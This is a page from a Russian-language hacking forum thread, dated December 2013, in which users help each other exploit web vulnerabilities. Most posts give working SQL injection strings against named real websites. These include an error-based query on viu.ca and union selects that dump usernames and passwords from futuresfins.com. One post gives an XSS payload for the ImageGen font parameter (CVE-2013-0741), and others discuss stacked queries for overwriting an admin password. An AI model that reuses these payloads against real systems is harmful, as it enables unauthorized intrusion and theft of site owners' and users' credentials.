HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2307 из 2438 « Первая < 13071807220722572297 2303 2304 2305 2306 2307 2308 2309 2310 2311 231723572407 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23061  
Старый 12.12.2013, 17:51
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Hapk  
Hapk said:
как изменить пароль через sql инъекцию
по гуглив немного я нашел вот что
UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее:

UPDATE users SET password = ‘qwerty’ WHERE name = admin;
помогите составить запрос
http://site.com/index.php?id=-4010'+union+select+1,2,3,pasword,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+from+admin+--+
никак не изменишь, нельзя в запросе использовать несколько разных операторов
 
Ответить с цитированием

  #23062  
Старый 12.12.2013, 18:03
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию
Цитата:
Сообщение от mgVolt  
mgVolt said:
Всем привет.
Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
Там есть нечто большее:

Код:
Code:
http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28information_schema.schemata%29where%281=1%29group%20by%28concat%28version%28%29,0x3b,user%28%29,floor%28rand%280%29*2%29%29%20%29having%28min%280%29%29%29
 
Ответить с цитированием

  #23063  
Старый 12.12.2013, 18:20
mgVolt
Новичок
Регистрация: 22.08.2007
Сообщений: 2
Провел на форуме:
14711

Репутация: 0
По умолчанию
Цитата:
Сообщение от Inoms  
Inoms said:
Там есть нечто большее:
Код:
Code:
http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28information_schema.schemata%29where%281=1%29group%20by%28concat%28version%28%29,0x3b,user%28%29,floor%28rand%280%29*2%29%29%20%29having%28min%280%29%29%29
Круто, но мне сам сайт не нужен, просто взял первый попавшийся, где используется imagegen
 
Ответить с цитированием

  #23064  
Старый 12.12.2013, 18:27
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию
Цитата:
Сообщение от mgVolt  
mgVolt said:
Круто, но мне сам сайт не нужен, просто взял первый попавшийся, где используется imagegen
Код:
Code:
http://www.viu.ca/ImageGen.ashx?font=%3Cscript%3Ealert%28/Test/%29%3C/script%3E
 
Ответить с цитированием

  #23065  
Старый 12.12.2013, 18:29
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
никак не изменишь, нельзя в запросе использовать несколько разных операторов
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой ;.

Например:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]victim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#DD0000"]'+union+select+1,2,3...; UPDATE '[/COLOR][COLOR="#0000BB"]admin_login[/COLOR][COLOR="#DD0000"]' SET '[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#DD0000"]' = '[/COLOR][COLOR="#0000BB"]pas1[/COLOR][COLOR="#DD0000"]' WHERE login_name='[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#DD0000"]'

[/COLOR][/COLOR] 
В случае с Mysql это не прокатит.
 
Ответить с цитированием

  #23066  
Старый 12.12.2013, 18:34
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию
Это ещё зависит от используемого ЯП и функции выполнения запросов. В стандартной mysql_query из php множественные запросы запрещены))
 
Ответить с цитированием

  #23067  
Старый 12.12.2013, 20:42
MrKloud
Guest
Сообщений: n/a
Провел на форуме:
1743

Репутация: 0
По умолчанию
Уважаемые, помогите вывести хоть что нибудь.

Цитата:
Сообщение от None  
http://www.futuresfins.com/fin-detail.php?id=1+union+select+group_concat(0x757365 726e616d65,0x3b,0x70617373776f7264),2,3,4,5,6,7,8, 9,10,11+from+information_schema.columns+where+tabl e_name=0x7573657273+limit+1
 
Ответить с цитированием

  #23068  
Старый 12.12.2013, 20:47
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию
Цитата:
Сообщение от MrKloud  
MrKloud said:
Уважаемые, помогите вывести хоть что нибудь.
/thread43966.html

Цитата:
Сообщение от None  
www.futuresfins.com/fin-detail.php?id=1+union+select+1,(select(@x)from(sel ect (@x:=0x00),(select(0)from(Future_future2.users)whe re(0x00)in(@x:=concat(@x,0x3c62723e,username,0x3a, password))))x),3,4,5,6,7,8, 9,10,11+--+
 
Ответить с цитированием

  #23069  
Старый 12.12.2013, 22:09
Hapk
Guest
Сообщений: n/a
Провел на форуме:
70690

Репутация: -5
По умолчанию
Цитата:
Сообщение от YaBtr  
YaBtr said:
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой
;
.
Например:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]victim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#DD0000"]'+union+select+1,2,3...; UPDATE '[/COLOR][COLOR="#0000BB"]admin_login[/COLOR][COLOR="#DD0000"]' SET '[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#DD0000"]' = '[/COLOR][COLOR="#0000BB"]pas1[/COLOR][COLOR="#DD0000"]' WHERE login_name='[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#DD0000"]'

[/COLOR][/COLOR] 
В случае с Mysql это не прокатит.
вот так?

http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
 
Ответить с цитированием

  #23070  
Старый 12.12.2013, 22:13
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Hapk  
Hapk said:
вот так?
http://site.ru/index.php?id=123'+UNION%0d%0aSELECT+1,2,3,admin,5, 6,7,8,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE usrname='admin'+--+
тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
 
Ответить с цитированием
Ответ
Страница 2307 из 2438 « Первая < 13071807220722572297 2303 2304 2305 2306 2307 2308 2309 2310 2311 231723572407 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ